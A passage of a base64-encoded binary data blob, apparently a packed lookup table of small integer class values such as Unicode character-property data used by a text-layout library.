wBPAE8ATwBPAE8ATwAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAFAAHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHgAeAB4AHgAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAeAB4AHQAdAB0AHQAeAB4AHgAeAB4AHgAeAB4AHgAeAB0AHQAeAB0AHQAdAB0AHQAdAB0AHgAeAB4AHgAeAB4AHgAeAB0AHQAeAB4AHQAdAB4AHgAeAB4AHQAdAB4AHgAeAB4AHQAdAB0AHgAeAB0AHgAeAB0AHQAdAB0AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAdAB0AHQAdAB4AHgAeAB4AHgAeAB4AHgAeAB0AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlAB4AHQAdAB4AHgAdAB4AHgAeAB4AHQAdAB4AHgAeAB4AJQAlAB0AHQAlAB4AJQAlACUAIAAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAeAB4AHgAeAB0AHgAdAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAdAB0AHgAdAB0AHQAeAB0AJQAdAB0AHgAdAB0AHgAdAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHQAdAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAdAB0AHQAdACUAHgAlACUAJQAdACUAJQAdAB0AHQAlACUAHQAdACUAHQAdACUAJQAlAB4AHQAeAB4AHgAeAB0AHQAlAB0AHQAdAB0AHQAdACUAJQAlACUAJQAdACUAJQAgACUAHQAdACUAJQAlACUAJQAlACUAJQAeAB4AHgAlACUAIAAgACAAIAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB0AHgAeAB4AFwAXABcAFwAXABcAHgATABMAJQAeAB4AHgAWABEAFgARABYAEQAWABEAFgARABYAEQAWABEATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeABYAEQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAWABEAFgARABYAEQAWABEAFgARAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AFgARABYAEQAWABEAFgARABYAEQAWABEAFgARABYAEQAWABEAFgARABYAEQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAWABEAFgARAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AFgARAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAdAB0AHQAdAB0AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AUABQAFAAUAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAEAAQABAAeAB4AKwArACsAKwArABMADQANAA0AUAATAA0AUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAUAANACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAEAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQACsAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXAA0ADQANAA0ADQANAA0ADQAeAA0AFgANAB4AHgAXABcAHgAeABcAFwAWABEAFgARABYAEQAWABEADQANAA0ADQATAFAADQANAB4ADQANAB4AHgAeAB4AHgAMAAwADQANAA0AHgANAA0AFgANAA0ADQANAA0ADQANAA0AHgANAB4ADQANAB4AHgAeACsAKwArACsAKwArACsAKwArACsAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwArACsAKwArACsAKwArACsAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAlACUAJQAlACUAJQAlACUAJQAlACUAJQArACsAKwArAA0AEQARACUAJQBHAFcAVwAWABEAFgARABYAEQAWABEAFgARACUAJQAWABEAFgARABYAEQAWABEAFQAWABEAEQAlAFcAVwBXAFcAVwBXAFcAVwBXAAQABAAEAAQABAAEACUAVwBXAFcAVwA2ACUAJQBXAFcAVwBHAEcAJQAlACUAKwBRAFcAUQBXAFEAVwBRAFcAUQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFEAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBRAFcAUQBXAFEAVwBXAFcAVwBXAFcAUQBXAFcAVwBXAFcAVwBRAFEAKwArAAQABAAVABUARwBHAFcAFQBRAFcAUQBXAFEAVwBRAFcAUQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFEAVwBRAFcAUQBXAFcAVwBXAFcAVwBRAFcAVwBXAFcAVwBXAFEAUQBXAFcAVwBXABUAUQBHAEcAVwArACsAKwArACsAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAKwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAKwAlACUAVwBXAFcAVwAlACUAJQAlACUAJQAlACUAJQAlACsAKwArACsAKwArACsAKwArACsAKwArAFEAUQBRAFEAUQBRAFEAUQBRAFEAUQBRAFEAUQBRAFEAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQArAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBPAE8ATwBPAE8ATwBPAE8AJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACUAJQAlAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAEcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAADQATAA0AUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABLAEsASwBLAEsASwBLAEsASwBLAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAFAABAAEAAQABAAeAAQABAAEAAQABAAEAAQABAAEAAQAHgBQAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AUABQAAQABABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAAeAA0ADQANAA0ADQArACsAKwArACsAKwArACsAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AUAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAB4AHgAeAB4AHgAeAFAAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAHgAeAB4AHgAeAB4AHgAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAeAB4AUABQAFAAUABQAFAAUABQAFAAUABQAAQAUABQAFAABABQAFAAUABQAAQAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAAEAAQABAAeAB4AHgAeAAQAKwArACsAUABQAFAAUABQAFAAHgAeABoAHgArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAADgAOABMAEwArACsAKwArACsAKwArACsABAAEAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAAEAAQABAAEACsAKwArACsAKwArACsAKwANAA0ASwBLAEsASwBLAEsASwBLAEsASwArACsAKwArACsAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABABQAFAAUABQAFAAUAAeAB4AHgBQAA4AUABQAAQAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAAEAA0ADQBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArAB4AWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYAFgAWABYACsAKwArAAQAHgAeAB4AHgAeAB4ADQANAA0AHgAeAB4AHgArAFAASwBLAEsASwBLAEsASwBLAEsASwArACsAKwArAB4AHgBcAFwAXABcAFwAKgBcAFwAXABcAFwAXABcAFwAXABcAEsASwBLAEsASwBLAEsASwBLAEsAXABcAFwAXABcACsAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACsAKwArACsAKwArACsAKwArAFAAUABQAAQAUABQAFAAUABQAFAAUABQAAQABAArACsASwBLAEsASwBLAEsASwBLAEsASwArACsAHgANAA0ADQBcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAKgAqACoAXAAqACoAKgBcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXAAqAFwAKgAqACoAXABcACoAKgBcAFwAXABcAFwAKgAqAFwAKgBcACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFwAXABcACoAKgBQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAA0ADQBQAFAAUAAEAAQAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUAArACsAUABQAFAAUABQAFAAKwArAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAHgAeACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQADQAEAAQAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAVABVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBUAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVAFUAVQBVACsAKwArACsAKwArACsAKwArACsAKwArAFkAWQBZAFkAWQBZAFkAWQBZAFkAWQBZAFkAWQBZAFkAWQBZAFkAKwArACsAKwBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAWgBaAFoAKwArACsAKwAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAKwArACsAKwArAFYABABWAFYAVgBWAFYAVgBWAFYAVgBWAB4AVgBWAFYAVgBWAFYAVgBWAFYAVgBWAFYAVgArAFYAVgBWAFYAVgArAFYAKwBWAFYAKwBWAFYAKwBWAFYAVgBWAFYAVgBWAFYAVgBWAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAEQAWAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUAAaAB4AKwArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAGAARABEAGAAYABMAEwAWABEAFAArACsAKwArACsAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACUAJQAlACUAJQAWABEAFgARABYAEQAWABEAFgARABYAEQAlACUAFgARACUAJQAlACUAJQAlACUAEQAlABEAKwAVABUAEwATACUAFgARABYAEQAWABEAJQAlACUAJQAlACUAJQAlACsAJQAbABoAJQArACsAKwArAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArAAcAKwATACUAJQAbABoAJQAlABYAEQAlACUAEQAlABEAJQBXAFcAVwBXAFcAVwBXAFcAVwBXABUAFQAlACUAJQATACUAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXABYAJQARACUAJQAlAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwAWACUAEQAlABYAEQARABYAEQARABUAVwBRAFEAUQBRAFEAUQBRAFEAUQBRAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAEcARwArACsAVwBXAFcAVwBXAFcAKwArAFcAVwBXAFcAVwBXACsAKwBXAFcAVwBXAFcAVwArACsAVwBXAFcAKwArACsAGgAbACUAJQAlABsAGwArAB4AHgAeAB4AHgAeAB4AKwArACsAKwArACsAKwArACsAKwAEAAQABAAQAB0AKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwBQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsADQANAA0AKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArAB4AHgAeAB4AHgAeAB4AHgAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAFAAHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAQAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAEAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArAA0AUABQAFAAUAArACsAKwArAFAAUABQAFAAUABQAFAAUAANAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwAeACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAKwArAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUAArACsAKwBQACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwANAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAeAB4AUABQAFAAUABQAFAAUAArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUAArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArAA0AUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAUABQAFAAUABQAAQABAAEACsABAAEACsAKwArACsAKwAEAAQABAAEAFAAUABQAFAAKwBQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArAAQABAAEACsAKwArACsABABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArAA0ADQANAA0ADQANAA0ADQAeACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAeAFAAUABQAFAAUABQAFAAUAAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAArACsAKwArAFAAUABQAFAAUAANAA0ADQANAA0ADQAUACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsADQANAA0ADQANAA0ADQBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArAB4AHgAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArAFAAUABQAFAAUABQAAQABAAEAAQAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUAArAAQABAANACsAKwBQAFAAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAAQABAAEAAQABAAEAAQABAAEAAQABABQAFAAUABQAB4AHgAeAB4AHgArACsAKwArACsAKwAEAAQABAAEAAQABAAEAA0ADQAeAB4AHgAeAB4AKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsABABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgANAA0ADQANACsAKwArACsAKwArACsAKwArACsAKwAeACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArACsAKwBLAEsASwBLAEsASwBLAEsASwBLACsAKwArACsAKwArAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACsASwBLAEsASwBLAEsASwBLAEsASwANAA0ADQANAFAABAAEAFAAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAeAA4AUAArACsAKwArACsAKwArACsAKwAEAFAAUABQAFAADQANAB4ADQAEAAQABAAEAB4ABAAEAEsASwBLAEsASwBLAEsASwBLAEsAUAAOAFAADQANAA0AKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQABAAEAAQABAANAA0AHgANAA0AHgAEACsAUABQAFAAUABQAFAAUAArAFAAKwBQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAA0AKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsABAAEAAQABAArAFAAUABQAFAAUABQAFAAUAArACsAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAUABQACsAUABQAFAAUABQACsABAAEAFAABAAEAAQABAAEAAQABAArACsABAAEACsAKwAEAAQABAArACsAUAArACsAKwArACsAKwAEACsAKwArACsAKwBQAFAAUABQAFAABAAEACsAKwAEAAQABAAEAAQABAAEACsAKwArAAQABAAEAAQABAArACsAKwArACsAKwArACsAKwArACsABAAEAAQABAAEAAQABABQAFAAUABQAA0ADQANAA0AHgBLAEsASwBLAEsASwBLAEsASwBLAA0ADQArAB4ABABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAEAAQABAAEAFAAUAAeAFAAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAArACsABAAEAAQABAAEAAQABAAEAAQADgANAA0AEwATAB4AHgAeAA0ADQANAA0ADQANAA0ADQANAA0ADQANAA0ADQANAFAAUABQAFAABAAEACsAKwAEAA0ADQAeAFAAKwArACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAFAAKwArACsAKwArACsAKwBLAEsASwBLAEsASwBLAEsASwBLACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAXABcAFwAKwArACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwBcAFwADQANAA0AKgBQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwBQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAKwArAFAAKwArAFAAUABQAFAAUABQAFAAUAArAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQAKwAEAAQAKwArAAQABAAEAAQAUAAEAFAABAAEAA0ADQANACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAArACsABAAEAAQABAAEAAQABABQAA4AUAAEACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAFAABAAEAAQABAAEAAQABAAEAAQABABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAFAABAAEAAQABAAOAB4ADQANAA0ADQAOAB4ABAArACsAKwArACsAKwArACsAUAAEAAQABAAEAAQABAAEAAQABAAEAAQAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAA0ADQANAFAADgAOAA4ADQANACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAABAAEAAQABAAEAAQABAAEACsABAAEAAQABAAEAAQABAAEAFAADQANAA0ADQANACsAKwArACsAKwArACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwAOABMAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQACsAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAArACsAKwAEACsABAAEACsABAAEAAQABAAE